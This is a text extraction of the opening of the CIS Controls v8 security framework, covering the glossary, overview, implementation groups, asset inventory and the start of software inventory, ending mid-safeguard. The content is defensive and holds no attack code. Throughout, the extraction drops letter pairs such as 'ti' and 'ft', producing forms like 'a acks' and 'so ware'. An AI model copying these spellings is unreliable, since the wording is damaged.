CIS Contr2023

CIS Controls Version 8
CIS Controls v8 Page

CIS Controls v8 Page 1
CIS Controls v8 Page

CIS Controls Version 8
Contents
Glossary ............................................................................................................... iv
Acronyms and Abbrevia ons ............................................................................... vii
Overview ...............................................................................................................1
Introduc on 1
This Version of the CIS Controls 3
The CIS Controls Ecosystem (“It’s not about the list”) 4
How to Get Started 5
Using or Transi oning from Prior Versions of the CIS Controls 5
Structure of the CIS Controls 5
Implementa on Groups 6
Control 01 Inventory and Control of Enterprise Assets ............................................................8

Why is this Control cri cal? 8
Procedures and tools 9
Safeguards 10
Control 02
Inventory and Control of So ware Assets ............................................................11
Safeguards 12
Control 03
Data Protec on ...................................................................................................14
Safeguards 15
Control 04
Secure Configura on of Enterprise Assets and So ware .....................................17
Safeguards 19
Control 05
Account Management .........................................................................................20
Safeguards 21
Control 06
Access Control Management ...............................................................................23
Safeguards 24
CIS Controls v8 Contents Page i

Control 07 Con nuous Vulnerability Management ................................................................26
Safeguards 28
Control 08 Audit Log Management .......................................................................................29
Safeguards 30
Control 09 Email and Web Browser Protec ons ....................................................................31
Safeguards 32
Control 10 Malware Defenses ...............................................................................................34
Safeguards 35
Control 11 Data Recovery .....................................................................................................36
Safeguards 37
Control 12 Network Infrastructure Management ...................................................................38
Safeguards 39
Control 13 Network Monitoring and Defense ........................................................................41
Safeguards 42
Control 14 Security Awareness and Skills Training ...............................................................44
CIS Controls v8 Contents Page ii

Safeguards 45
Control 15 Service Provider Management .............................................................................47
Safeguards 48
Control 16 Applica on So ware Security .............................................................................50
Safeguards 53
Control 17 Incident Response Management ..........................................................................55
Safeguards 56
Control 18 Penetra on Tes ng .............................................................................................58
Safeguards 60
Appendix A Resources and References ................................................................................. A1
Appendix B Controls and Safeguards Index ........................................................................... B1
CIS Controls v8 Contents Page iii

Glossary
Administrator accounts Dedicated accounts with escalated privileges and used for managing aspects of a
computer, domain, or the whole enterprise informa on technology infrastructure.
Common administrator account subtypes include root accounts, local administrator and
domain administrator accounts, and network or security appliance administrator accounts.
Applica on A program, or group of programs, hosted on enterprise assets and designed for endusers.
Applica ons are considered a so ware asset in this document. Examples include web,
database, cloud-based, and mobile applica ons.
Authen ca on systems A system or mechanism used to iden fy a user through associa ng an incoming request with a
set of iden fying creden als. The creden als provided are compared to those on a file in a
database of the authorized user’s informa on on a local opera ng system, user directory
service, or within an authen ca on server. Examples of authen ca on systems can include
ac ve directory, Mul -Factor Authen ca on (MFA), biometrics, and tokens.
Authoriza on systems A system or mechanism used to determine access levels or user/client privileges related to
system resources including files, services, computer programs, data, and applica on features.
An authoriza on system grants or denies access to a resource based on the user’s iden ty.
Examples of authoriza on systems can include ac ve directory, access control lists, and role-
based access control lists.
Cloud environment A virtualized environment that provides convenient, on-demand network access to a shared
pool of configurable resources such as network, compu ng, storage, applica ons, and
services. There are five essen al characteris cs to a cloud environment: on-demand self-
service, broad network access, resource pooling, rapid elas city, and measured service. Some
services offered through cloud environments include So ware as a Service (SaaS), Pla orm as
a Service (PaaS), and Infrastructure as a Service (IaaS).
Database Organized collec on of data, generally stored and accessed electronically from a computer
system. Databases can reside remotely or on-site. Database Management Systems (DMSs) are
used to administer databases, and are not considered part of a database for this document.
End-user devices Informa on technology (IT) assets used among members of an enterprise during work, off-
hours, or any other purpose. End-user devices include mobile and portable devices such as
laptops, smartphones and tablets, as well as desktops and worksta ons. For the purpose of
this document, end-user devices are a subset of enterprise assets.
Enterprise assets Assets with the poten al to store or process data. For the purpose of this document,
enterprise assets include end-user devices, network devices, non-compu ng/Internet of
Things (IoT) devices, and servers, in virtual, cloud-based, and physical environments.
Externally-exposed enterprise Refers to enterprise assets that are public facing and discoverable through domain name
assets system reconnaissance and network scanning from the public internet outside of the
enterprise’s network.
CIS Controls v8 Glossary Page iv

Internal enterprise assets Refers to non-public facing enterprise assets that can only be iden fied through network scans
and reconnaissance from within an enterprise’s network through authorized authen cated or
unauthen cated access.
Library Pre-wri en code, classes, procedures, scripts, configura on data, and more, used to
develop so ware programs and applica ons. It is designed to assist both the
programmer and the programming language compiler in building and execu ng
so ware.
Mobile end-user devices Small, enterprise issued end-user devices with intrinsic wireless capability, such as
smartphones and tablets. Mobile end-user devices are a subset of portable end-user devices,
including laptops, which may require external hardware for connec vity. For the purpose of
this document, mobile end-user devices are a subset of end-user devices.
Network devices Electronic devices required for communica on and interac on between devices on a
computer network. Network devices include wireless access points, firewalls, physical/ virtual
gateways, routers, and switches. These devices consist of physical hardware, as well as virtual
and cloud-based devices. For the purpose of this document, network devices are a subset of
enterprise assets.
Network infrastructure Refers to all of the resources of a network that make network or internet connec vity,
management, business opera ons, and communica on possible. It consists of hardware and
so ware, systems and devices, and it enables compu ng and communica on between users,
services, applica ons, and processes. Network infrastructure can be cloud, physical, or virtual.
Non-compu ng/Internet of Devices embedded with sensors, so ware, and other technologies for the purpose of
Things (IoT) devices connec ng, storing, and exchanging data with other devices and systems over the internet.
While these devices are not used for computa onal processes, they support an enterprise’s
ability to conduct business processes. Examples of these devices include printers, smart
screens, physical security sensors, industrial control systems, and informa on technology
sensors. For the purpose of this document, non-compu ng/IoT devices are a subset of
enterprise assets.
Opera ng system System so ware on enterprise assets that manages computer hardware and so ware
resources, and provides common services for programs. Opera ng systems are considered a
so ware asset and can be single- and mul -tasking, single- and mul user, distributed,
templated, embedded, real- me, and library.
Physical environment Physical hardware parts that make up a network, including cables and routers. The hardware is
required for communica on and interac on between devices on a network.
Portable end-user Transportable, end-user devices that have the capability to wirelessly connect to a network.
devices For the purpose of this document, portable end-user devices can include laptops and mobile
devices such as smartphones and tablets, all of which are a subset of enterprise assets.
Remote devices Any enterprise asset capable of connec ng to a network remotely, usually from public
internet. This can include enterprise assets such as end-user devices, network devices, non-
compu ng/Internet of Things (IoT) devices, and servers.
CIS Controls v8 Glossary Page v

Remote file systems Enable an applica on that runs on an enterprise asset to access files stored on a different
asset. Remote file systems o en make other resources, such as remote noncompu ng
devices, accessible from an asset. The remote file access takes place using some form of
local area network, wide area network, point-to-point link, or other communica on
mechanism. These file systems are o en referred to as network file systems or distributed
file systems.
Removable media Any type of storage device that can be removed from a computer while the system is
running and allows data to be moved from one system to another. Examples of removable
media include compact discs (CDs), digital versa le discs (DVDs) and
Blu-ray discs, tape backups, as well as diske es and universal serial bus (USB) drives.
Servers A device or system that provides resources, data, services, or programs to other devices on
either a local area network or wide area network. Servers can provide resources and use
them from another system at the same me. Examples include web servers, applica on
servers, mail servers, and file servers.
Service accounts A dedicated account with escalated privileges used for running applica ons and other
processes. Service accounts may also be created just to own data and configura on files. They
are not intended to be used by people, except for performing administra ve opera ons.
Services Refers to a so ware func onality or a set of so ware func onali es, such as the retrieval of
specified informa on or the execu on of a set of opera ons. Services provide a mechanism to
enable access to one or more capabili es, where the access is provided using a prescribed
interface and based on the iden ty of the requestor per the enterprise’s usage policies.
Social engineering Refers to a broad range of malicious ac vi es accomplished through human interac ons on
various pla orms, such as email or phone. It relies on psychological manipula on to trick users
into making security mistakes or giving away sensi ve informa on.
So ware assets Also referred to as so ware in this document, these are the programs and other opera ng
informa on used within an enterprise asset. So ware assets include opera ng systems and
applica ons.
User accounts An iden ty created for a person in a computer or compu ng system. For the purpose of this
document, user accounts refer to “standard” or “interac ve” user accounts with limited
privileges and are used for general tasks such as reading email and surfing the web. User
accounts with escalated privileges are covered under administrator accounts.
Virtual environment Simulates hardware to allow a so ware environment to run without the need to use a lot of
actual hardware. Virtualized environments are used to make a small number of resources act
as many with plenty of processing, memory, storage, and network capacity. Virtualiza on is
a fundamental technology that allows cloud compu ng to work.
CIS Controls v8 Glossary Page vi

Acronyms and Abbrevia ons
AAA Authen ca on, Authoriza on, and HECVAT Higher Educa on Community Vendor
Audi ng Assessment Toolkit
ACL Access Control List HIPAA Health Insurance Portability and
AD Ac ve Directory Accountability Act
HTTP Hypertext Transfer Protocol
AoC A esta on of Compliance
HTTPS Hypertext Transfer Protocol Secure
API Applica on Programming Interface
IaaS Infrastructure as a Service
BEC Business Email Compromise
IAM Iden ty and Access Management
C2 Command and Control
IDS Intrusion Detec on System
CCE Common Configura on Enumera on
IG Implementa on Group
CDM Community Defense Model
IOCs Indicators of Compromise
CIA Confiden ality, Integrity, and Availability
IoT Internet of Things
CIS Center for Internet Security
IP Internet Protocol
CIS-CAT CIS Configura on Assessment Tool
IPS Intrusion Preven on System
COTS Commercial off-the-Shelf
ISAC Informa on Sharing and Analysis Center
CPE Common Pla orm Enumera on
CREST Council of Registered Security Testers
ISO Interna onal Organiza on for
CSA Cloud Security Alliance Standardiza on
CSP Cloud Service Provider IT Informa on Technology
CVE Common Vulnerabili es and Exposures LotL Living off the Land
CVSS Common Vulnerability Scoring System MDM Mobile Device Management
DBIR Data Breach Inves ga ons Report MFA Mul -Factor Authen ca on
DEP Data Execu on Preven on MITRE ATT&CK MITRE Adversarial Tac cs, Techniques, and
DG Development Group Common Knowledge®
MS-ISAC Mul -State Informa on Sharing and
DHCP Dynamic Host Configura on Protocol
Analysis Center
DKIM DomainKeys Iden fied Mail
NaaS Network-as-a-Service
DLP Data Loss Preven on
NCSA Na onal Cyber Security Alliance
DMARC Domain-based Message Authen ca on,
NIDS Network Intrusion Detec on System
Repor ng, and Conformance
NIST Na onal Ins tute of Standards and
DMS Database Management System
Technology
DNS Domain Name System
OS Opera ng System
DPI Deep Packet Inspec on
OSS Open Source So ware
EDR Endpoint Detec on and Response
OVAL Open Vulnerability and Assessment
EOL End of Life Language
FFIEC Federal Financial Ins tu ons Examina on OWASP Open Web Applica on Security Project
Council PaaS Pla orm as a Service
CIS Controls v8 Page vii

FISMA Federal Informa on Security Moderniza on PAM Privileged Access Management
Act PCI Payment Card Industry
GRC Governance Risk and Compliance
Acronyms and Abbrevia ons

SaaS So ware as a Service
SAFECode So ware Assurance Forum for Excellence in
Code
SCADA Supervisory Control and Data Acquisi on
CIS Controls v8 viii

SCAP Security Content Automa on Protocol
SIEM Security Informa on and Event
Management
SIP System Integrity Protec on
SMS Short Messaging Service
SOC Security Opera ons Center
SOC 2 Service Organiza on Control 2
SPAM Something Posing as Mail
SPF Sender Policy Framework
SQL Structured Query Language
SSDF Secure So ware
Development Framework
SSH Secure Shell
SSO Single Sign-On
Telnet Teletype Network
TLS Transport Layer Security
TTPs Tac cs, Techniques, and Procedures
U.K. United Kingdom
URL Uniform Resource Locator
USB Universal Serial Bus
VPN Virtual Private Network
WDEG Windows Defender Exploit Guard
WPA2 Wi-Fi Protected Access 2
XCCDF Extensible Configura on Checklist
Descrip on Format
Acronyms and Abbrevia ons Page
CIS Controls v8 Page ix

CIS Controls v8 x
Overview
Introduc on
The CIS Controls® started as a simple grassroots ac vity to iden fy the most common and
important real-world cyber-a acks that affect enterprises every day, translate that knowledge
and experience into posi ve, construc ve ac on for defenders, and then share that
informa on with a wider audience. The original goals were modest—to help people and
enterprises focus their a en on and get started on the most important steps to defend
themselves from the a acks that really ma ered.
Led by the Center for Internet Security® (CIS®), the CIS Controls have matured into an
interna onal community of volunteer individuals and ins tu ons that:
• Share insights into a acks and a ackers, iden fy root causes, and translate that into
classes of defensive ac on
• Create and share tools, working aids, and stories of adop on and problem-solving
• Map the CIS Controls to regulatory and compliance frameworks in order to ensure
alignment and bring collec ve priority and focus to them
• Iden fy common problems and barriers (like ini al assessment and implementa on
roadmaps), and solve them as a community
The CIS Controls reflect the combined knowledge of experts from every part of the ecosystem
(companies, governments, individuals), with every role (threat responders and analysts,
technologists, informa on technology (IT) operators and defenders, vulnerability-finders, tool
makers, solu on providers, users, policy-makers, auditors, etc.), and across many sectors
(government, power, defense, finance, transporta on, academia, consul ng, security, IT, etc.),
who have banded together to create, adopt, and support the CIS Controls.
Evolu on of the CIS Controls
The CIS Controls started like many similar ac vi es; we gathered experts together, and shared
and argued un l we reached an agreement. This can be very valuable, depending on the
people at the table and their experience. Through documen ng and sharing the output, all
enterprises can benefit from the work of people they cannot hire or even meet. You can
improve the outcome (and your confidence in it) through selec ng experts that represent a
wide range of knowledge, bringing consistency to the process, and ensuring use of the best-
available informa on (especially about a acks). In the end, you are s ll depending on the
good judgment of a rela vely small group of people, captured in an informal and narra ve
way.
At CIS, we have been on a mul -year path to bring more data, rigor, and transparency to the
process of best prac ce recommenda ons (the CIS Benchmarks™ and the CIS Controls). All of
these elements are essen al to the matura on of a science to underlie cyber defense; and, all
are necessary to allow the tailoring and “nego a on” of security ac ons applicable in specific
cases, and as required through specific security frameworks, regula ons, and similar oversight
schemes.
CIS Controls v8 Overview Page 1

In the earliest versions of the CIS Controls, we used a standard list of publicly known a acks as
a simple and informal test of the usefulness of specific recommenda ons. Star ng in 2013, we
worked with the Verizon Data Breach Inves ga ons Report (DBIR) team to map the results of
their large-scale data analysis directly to the CIS Controls, as a way to match their summaries
of a acks into a standard program for defensive improvement.
CIS has recently released the Community Defense Model (CDM), which is our most data-
driven approach so far. In its ini al version, the CDM looks at the conclusions from the most
recent Verizon DBIR, along with data from the Mul -State Informa on Sharing and
Analysis Center® (MS-ISAC®), to iden fy what we believe to be the five most important
types of a acks. We describe those a acks using the MITRE Adversarial Tac cs,
Techniques, and Common Knowledge® (MITRE ATT&CK®)
Framework in order to create a ack pa erns (or specific combina ons of Tac cs and
Techniques used in those a acks). This allows us to analyze the value of individual defensive
ac ons (i.e., Safeguards1) against those a acks. Specifically, it also provides a consistent and
explainable way to look at the security value of a given set of defensive ac ons across the
a acker’s life cycle, and provide a basis for strategies like defensein-depth. The details of this
analysis are available on the CIS website. The bo om line is that we have taken a major step
towards iden fying the security value of the CIS Controls, or any subset of them. While these
ideas are s ll evolving, at CIS we are commi ed to the idea of security recommenda ons
based on data, presented transparently. For addi onal informa on, reference
h ps://www.cisecurity.org/ controls/v8/.
These ac vi es ensure that the CIS Security Best Prac ces (which include the CIS
Controls and CIS Benchmarks) are more than a checklist of “good things to do,” or “things
that could help”; instead, they are a prescrip ve, priori zed, highly focused set of ac ons
that have a community support network to make them implementable, usable, scalable,
and in alignment with all industry or government security requirements.
This Version of the CIS Controls

When we begin the work of a new version, we first sit down to establish “design principles”
that will be used to guide the process. These serve as a decision “touchstone” to remind us of
what is really important, and of the goals of the CIS
Controls. While these have been fairly consistent since the earliest versions of the CIS Controls,
we have been refining our thinking over the last couple of versions to focus on the role that
the CIS Controls play in the total picture of enterprise security.
Our design principles include:

• Offense Informs Defense – CIS Controls are selected, dropped, and priori zed based on data,
and on specific knowledge of a acker behavior and how to stop it
• Focus
– Help defenders iden fy the most cri cal things they need to do to stop the most
important a acks
– Avoid being tempted to solve every security problem—avoid adding “good things to
do” or “things you could do”
1
“Safeguards” were known as “Sub-Controls” prior to Version 8 of the CIS Controls.

• Feasible – All individual recommenda ons (Safeguards) must be specific and prac cal to
implement
• Measurable
– All CIS Controls, especially for Implementa on Group 1, must be measurable

– Simplify or remove ambiguous language to avoid inconsistent interpreta on – Some
Safeguards may have a threshold
• Align – Create and demonstrate “peaceful co-existence” with other governance,
regulatory, process management schemes, framework, and structures
– Cooperate with and point to exis ng, independent standards and security
recommenda ons where they exist, e.g., Na onal Ins tute of Standards and
Technology® (NIST®), Cloud Security Alliance (CSA), So ware Assurance Forum for
Excellence in Code (SAFECode), ATT&CK, Open Web Applica on Security Project®
(OWASP®)
In addi on, since Version 7, we have all seen significant changes in technology and the
cybersecurity ecosystem. Movement to cloud-based compu ng, virtualiza on, mobility,
outsourcing, Work-from-Home, and changing a acker tac cs have been central in every
discussion. Physical devices, fixed boundaries, and discrete islands of security implementa on
are less important, and so we reflect that in Version 8, through revised terminology and
grouping of Safeguards. Also, to guide adopters in implemen ng Version 8, CIS created a
glossary to remove ambiguity of terminology. Some ideas have been combined or grouped
differently to more naturally reflect the evolu on of technology, rather than how enterprise
teams or responsibili es might be organized, and always referring back to our guiding
principles.
The text of the CIS Controls document is just one step of a process to design, implement,
measure, report, and manage enterprise security. Taking this en re work stream into account
as we write the CIS Controls, we can support the total enterprise management process
through: making sure that each Safeguard asks for “one thing,” wherever possible, in a way
that is clear and requires minimal interpreta on; that we focus on measurable ac ons, and
define the measurement as part of the process; and, that we simplify the language to avoid
duplica on.
At CIS, we have always tried to be very conscious of the balance between addressing current
topics and the stability of an overall defensive improvement program. We have always tried to
focus on the founda ons of good cyber defense—and, always tried to keep our eyes on
emerging new defensive technology—while avoiding the “shiny new toys” or complex
technology that is out of reach for most enterprises.
The CIS Controls Ecosystem (“It’s not about the list”)

Whether you use the CIS Controls, and/or another way to guide your security improvement
program, you should recognize that “it’s not about the list.” You can get a credible list of
security recommenda ons from many sources—it is best to think of the list as a star ng
point. It is important to look for the ecosystem that grows up around the list. Where can I get
training, complementary informa on, explana ons; how have others implemented and used
these recommenda ons; is there a marketplace of vendor tools and services to choose from;
how will I measure progress or maturity; how does this align with the myriad regulatory and

compliance frameworks that apply to me? The true power of the CIS Controls is not about
crea ng the best list, it is about harnessing the experience of a community of individuals and
enterprises to actually make security improvements through the sharing of ideas, tools,
lessons, and collec ve ac on.
To support this, CIS acts as a catalyst and clearinghouse to help us all learn from each other.
Since Version 6, there has been an explosion of complementary informa on, products, and
services available from CIS, and from the industry-at-large. Please contact CIS for the following
kinds of working aids and other support materials, h ps://www.cisecurity.org/controls/v8/:
• Mappings from the CIS Controls to a very wide variety for formal Risk Management
Frameworks (like NIST®, Federal Informa on Security Moderniza on Act (FISMA),
Interna onal Organiza on for Standardiza on (ISO), etc.)
• Use cases of enterprise adop on
• A list of ongoing references to the CIS Controls in na onal and interna onal standards,
state and na onal legisla on and regula on, trade and professional associa ons, etc.
• Informa on tailored for small and medium enterprises
• Measurement and metrics for the CIS Controls
• Pointers to vendor white papers and other materials that support the CIS Controls
• Documenta on on alignment with the NIST® Cybersecurity Framework
How to Get Started

Historically, the CIS Controls were ordered in sequence to focus an enterprise’s cybersecurity
ac vi es, with a subset of the first six CIS Controls referred to as “cyber hygiene.” However,
this proved to be too simplis c. Enterprises, especially small ones, could struggle with some
of the early Safeguards and never get around to implemen ng later CIS Controls (for
example, having a backup strategy to help recover from ransomware). As a result, star ng
with Version 7.1, we created CIS Controls Implementa on Groups (IGs) as our recommended
new guidance to priori ze implementa on.
The CIS Controls IGs are self-assessed categories for enterprises. Each IG iden fies a subset of
the CIS Controls that the community has broadly assessed to be applicable for an enterprise
with a similar risk profile and resources to strive to implement. These IGs represent a
horizontal look across the CIS Controls tailored to different types of enterprises. Specifically,
we have defined IG1 as “basic cyber hygiene,” the founda onal set of cyber defense
Safeguards that every enterprise should apply to guard against the most common a acks
(h ps://www.cisecurity.org/controls/v8/). Each IG then builds upon the previous one: IG2
includes IG1, and IG3 includes all CIS Safeguards in IG1 and IG2.
Using or Transi oning from Prior Versions of the CIS Controls

We believe that Version 8 of the CIS Controls is the best we have ever produced.
We also appreciate that enterprises who are ac vely using prior versions of the CIS
Controls as a key part of their defensive strategy might be reluctant to move to Version 8. Our
recommenda on is that if you are using Version 7 or Version 7.1, you are following an effec ve
and usable security plan, and over me you should consider moving to Version 8. If you are

using Version 6 (or earlier), our recommenda on is that you should start to plan a transi on to
Version 8 as soon as prac cable.
For prior versions of the CIS Controls, we were able to provide only the simplest tools to aid in
transi on from prior versions, basically a spreadsheet-based change log. For Version 8, we
have taken a much more holis c approach and worked with numerous partners to ensure that
the CIS Controls ecosystem is ready to support your transi on,
h ps://www.cisecurity.org/controls/v8/.
Structure of the CIS Controls

The presenta on of each Control in this document includes the following elements:
• Overview. A brief descrip on of the intent of the Control and its u lity as a defensive
ac on
• Why is this Control cri cal? A descrip on of the importance of this Control in blocking,
mi ga ng, or iden fying a acks, and an explana on of how a ackers ac vely exploit the
absence of this Control
• Procedures and tools. A more technical descrip on of the processes and technologies that
enable implementa on and automa on of this Control
• Safeguard descrip ons. A table of the specific ac ons that enterprises should take to
implement the Control
Implementa on Groups
IG1
An IG1 enterprise is small to medium-sized with limited IT and cybersecurity exper se to

dedicate towards protec ng IT assets and personnel. The principal concern of these
enterprises is to keep the business opera onal, as they have a limited tolerance for
down me. The sensi vity of the data that they are trying to protect is low and principally
surrounds employee and financial informa on.
Safeguards selected for IG1 should be implementable with limited cybersecurity exper se and
aimed to thwart general, non-targeted a acks. These Safeguards will also typically be
designed to work in conjunc on with small or home office commercial o he-shelf (COTS)
hardware and so ware.
IG2 (Includes IG1)
An IG2 enterprise employs individuals responsible for managing and protec ng IT

infrastructure. These enterprises support mul ple departments with differing risk profiles
based on job func on and mission. Small enterprise units may have regulatory compliance
burdens. IG2 enterprises o en store and process sensi ve client or enterprise informa on and
can withstand short interrup ons of service. A major concern is loss of public confidence if a
breach occurs.

Safeguards selected for IG2 help security teams cope with increased opera onal complexity.
Some Safeguards will depend on enterprise-grade technology and specialized exper se to
properly install and configure.
IG3 (Includes IG1 and IG2)
An IG3 enterprise employs security experts that specialize in the different facets of
cybersecurity (e.g., risk management, penetra on tes ng, applica on security). IG3 assets and
data contain sensi ve informa on or func ons that are subject to regulatory and compliance
oversight. An IG3 enterprise must address availability of services and the confiden ality and
integrity of sensi ve data. Successful a acks can cause significant harm to the public welfare.
Safeguards selected for IG3 must abate targeted a acks from a sophis cated adversary and
reduce the impact of zero-day a acks.

Inventory and Control of
Enterprise Assets
Safeguards Total• 5 IG1• 2/5 IG2• 4/5 IG3• 5/5
Overview Ac vely manage (inventory, track, and correct) all enterprise assets
(end-user devices, including portable and mobile; network devices;
non-compu ng/Internet of Things (IoT) devices; and servers)
connected to the infrastructure physically, virtually, remotely, and those
within cloud environments, to accurately know the totality of assets
that need to be monitored and protected within the enterprise. This
will also support iden fying unauthorized and unmanaged assets to
remove or remediate.
Why is this Control cri cal?

Enterprises cannot defend what they do not know they have. Managed control of all
enterprise assets also plays a cri cal role in security monitoring, incident response, system
backup, and recovery. Enterprises should know what data is cri cal to them, and proper asset
management will help iden fy those enterprise assets that hold or manage this cri cal data,
so that appropriate security controls can be applied.
External a ackers are con nuously scanning the internet address space of target enterprises,
premise-based or in the cloud, iden fying possibly unprotected assets a ached to an
enterprise’s network. A ackers can take advantage of new assets that are installed, yet not
securely configured and patched. Internally, uniden fied assets can also have weak security
configura ons that can make them vulnerable to web- or email-based malware; and,
adversaries can leverage weak security configura ons for traversing the network, once they
are inside.
Addi onal assets that connect to the enterprise’s network (e.g., demonstra on systems,
temporary test systems, guest networks) should be iden fied and/or isolated in order to
prevent adversarial access from affec ng the security of enterprise opera ons.
CIS Controls v8 Control 01: Inventory and Control of Enterprise Assets Page 9
Large, complex, dynamic enterprises understandably struggle with the challenge of managing
intricate, fast-changing environments. However, a ackers have shown the ability, pa ence,
and willingness to “inventory and control” our enterprise assets at very large scale in order to
support their opportuni es.
Another challenge is that portable end-user devices will periodically join a network and then
disappear, making the inventory of currently available assets very dynamic. Likewise, cloud
environments and virtual machines can be difficult to track in asset inventories when they are
shut down or paused.
Another benefit of complete enterprise asset management is suppor ng incident response,

both when inves ga ng the origina on of network traffic from an asset on the network and
when iden fying all poten ally vulnerable, or impacted, assets of similar type or loca on
during an incident.
Procedures and tools

This CIS Control requires both technical and procedural ac ons, united in a process that
accounts for, and manages the inventory of, enterprise assets and all associated data
throughout its life cycle. It also links to business governance through establishing data/asset
owners who are responsible for each component of a business process. Enterprises can use
large-scale, comprehensive enterprise products to maintain IT asset inventories. Smaller
enterprises can leverage security tools already installed on enterprise assets or used on the
network to collect this data. This includes doing a discovery scan of the network with a
vulnerability scanner; reviewing an -malware logs, logs from endpoint security portals,
network logs from switches, or authen ca on logs; and managing the results in a spreadsheet
or database.
Maintaining a current and accurate view of enterprise assets is an ongoing and dynamic
process. Even for enterprises, there is rarely a single source of truth, as enterprise assets are
not always provisioned or installed by the IT department. The reality is that a variety of
sources need to be “crowd-sourced” to determine a highconfidence count of enterprise
assets. Enterprises can ac vely scan on a regular basis, sending a variety of different packet
types to iden fy assets connected to the network. In addi on to asset sources men oned
above for small enterprises, larger enterprises can collect data from cloud portals and logs
from enterprise pla orms such as: Ac ve Directory (AD), Single Sign-On (SSO), Mul -Factor
Authen ca on (MFA), Virtual Private Network (VPN), Intrusion Detec on Systems (IDS) or
Deep Packet Inspec on (DPI), Mobile Device Management (MDM), and vulnerability scanning
tools. Property inventory databases, purchase order tracking, and local inventory lists are
other sources of data to determine which devices are connected. There are tools and
methods that normalize this data to iden fy devices that are unique among these sources.
→ For cloud-specific guidance, refer to the CIS Controls Cloud Companion

Guide – h ps://www.cisecurity.org/controls/v8/
→ For tablet and smart phone guidance, refer to the CIS Controls Mobile Companion
→ For IoT guidance, refer to the CIS Controls Internet of Things Companion
→ For Industrial Control Systems (ICS) guidance, refer to the CIS Controls ICS Implementa on Guide –
h ps://www.cisecurity.org/controls/v8/
Safeguards
NUMBERTITLE/DESCRIPTION ASSET TYPE SECURITY FUNCTION IG1 IG2 IG3
1.1 Establish and Maintain Detailed Enterprise Asset Inventory Devices -Iden fy- •••
Establish and maintain an accurate, detailed, and up-to-date inventory of all enterprise assets with the poten al to store or
process data, to include: end-user devices (including portable and mobile), network devices, noncompu ng/IoT devices, and
servers. Ensure the inventory records the network address (if sta c), hardware address, machine name, data asset owner,
department for each asset, and whether the asset has been approved to connect to the network. For mobile end-user
devices, MDM type tools can support this process, where appropriate. This inventory includes assets connected to the
infrastructure physically, virtually, remotely, and those within cloud environments. Addi onally, it includes assets that are
regularly connected to the enterprise’s network infrastructure, even if they are not under control of the enterprise. Review
and update the inventory of all enterprise assets bi-annually, or more frequently.
1.2 Address Unauthorized Assets Devices -Respond- •••

Ensure that a process exists to address unauthorized assets on a weekly basis. The enterprise may choose to remove the
asset from the network, deny the asset from connec ng remotely to the network, or quaran ne the asset.
1.3 U lize an Ac ve Discovery Tool Devices -Detect- ••

U lize an ac ve discovery tool to iden fy assets connected to the enterprise’s network. Configure the ac ve discovery tool to
execute daily, or more frequently.
1.4 Use Dynamic Host Configura on Protocol (DHCP) Logging Devices -Iden fy- ••
to Update Enterprise Asset Inventory
Use DHCP logging on all DHCP servers or Internet Protocol (IP) address management tools to update the
enterprise’s asset inventory. Review and use logs to update the enterprise’s asset inventory weekly, or more
frequently.
1.5 Use a Passive Asset Discovery Tool Devices -Detect- •

Use a passive discovery tool to iden fy assets connected to the enterprise’s network. Review and use scans to update the
enterprise’s asset inventory at least weekly, or more frequently.
Inventory and Control of
So ware Assets
Overview Ac vely manage (inventory, track, and correct) all so ware (opera ng
systems and applica ons) on the network so that only authorized
so ware is installed and can execute, and that unauthorized and
unmanaged so ware is found and prevented from installa on or
execu on.

A complete so ware inventory is a cri cal founda on for preven ng a acks. A ackers
con nuously scan target enterprises looking for vulnerable versions of so ware that can be
remotely exploited. For example, if a user opens a malicious website or a achment with a
vulnerable browser, an a acker can o en install backdoor programs and bots that give the
a acker long-term control of the system. A ackers can also use this access to move laterally
through the network. One of the key defenses against these a acks is upda ng and patching
so ware. However, without a complete inventory of so ware assets, an enterprise cannot
determine if they have vulnerable so ware, or if there are poten al licensing viola ons.
Even if a patch is not yet available, a complete so ware inventory list allows an
enterprise to guard against known a acks un l the patch is released. Some sophis cated
a ackers use “zero-day exploits,” which take advantage of previously unknown
vulnerabili es that have yet to have a patch released from the so ware vendor.
Depending on the severity of the exploit, an enterprise can implement temporary
mi ga on measures to guard against a acks un l the patch is released.
Management of so ware assets is also important to iden fy unnecessary security risks. An

enterprise should review its so ware inventory to iden fy any enterprise assets running
so ware that is not needed for business purposes. For example, an enterprise asset may come
installed with default so ware that creates a poten al security risk and provides no benefit to
CIS Controls v8 Control 02: Inventory and Control of So ware Assets Page 12
the enterprise. It is cri cal to inventory, understand, assess, and manage all so ware
connected to an enterprise’s infrastructure.

Allowlis ng can be implemented using a combina on of commercial allowlis ng tools,
policies, or applica on execu on tools that come with an -malware suites and popular
opera ng systems. Commercial so ware inventory tools are widely available and used in
many enterprises today. The best of these tools provides an inventory check of hundreds of
common so ware used in enterprises. The tools pull informa on about the patch level of
each installed program to ensure that it is the latest version and leverage standardized
applica on names, such as those found in the Common Pla orm Enumera on (CPE)
specifica on. One example of a method that can be used is the Security Content Automa on
Protocol (SCAP). Addi onal informa on on SCAP can be found here:
h ps://nvlpubs.nist.gov/nistpubs/SpecialPublica ons/NIST. SP.800-126r3.pdf
Features that implement allowlists are included in many modern endpoint security suites and
even na vely implemented in certain versions of major opera ng systems. Moreover,
commercial solu ons are increasingly bundling together an -malware, an spyware, personal
firewall, and host-based IDS and Intrusion Preven on System (IPS), along with applica on
allow and block lis ng. In par cular, most endpoint security solu ons can look at the name,
file system loca on, and/or cryptographic hash of a given executable to determine whether
the applica on should be allowed to run on the protected machine. The most effec ve of
these tools offer custom allowlists based on executable path, hash, or regular expression
matching. Some even include a nonmalicious, yet unapproved, applica ons func on that
allows administrators to define rules for execu on of specific so ware for certain users and
at certain mes of the day.
→ For cloud-specific guidance, refer to the CIS Controls Cloud Companion

→ For IoT guidance, refer to the CIS Controls Internet of Things Companion
→ For Industrial Control Systems (ICS) guidance, refer to the CIS Controls ICS
Implementa on Guide – h ps://www.cisecurity.org/controls/v8/
Safeguards
2.1 Establish and Maintain a So ware Inventory Applica ons -Iden fy- •••
Establish and maintain a detailed inventory of all licensed so ware installed on enterprise assets. The so ware inventory
must document the tle, publisher, ini al install/use date, and business purpose for each entry; where appropriate, include
the Uniform Resource Locator (URL), app store(s), version(s), deployment mechanism, and decommission date. Review and
update the so ware inventory bi-annually, or more frequently.
2.2 Ensure Authorized So ware is Currently Supported Applica ons -Iden fy- •••
Ensure that only currently supported so ware is designated as authorized in the so ware inventory for enterprise assets. If
so ware is unsupported, yet necessary for the fulfillment of the enterprise’s mission, document an excep on detailing
mi ga ng controls and residual risk acceptance. For any unsupported so ware without an excep on documenta on,
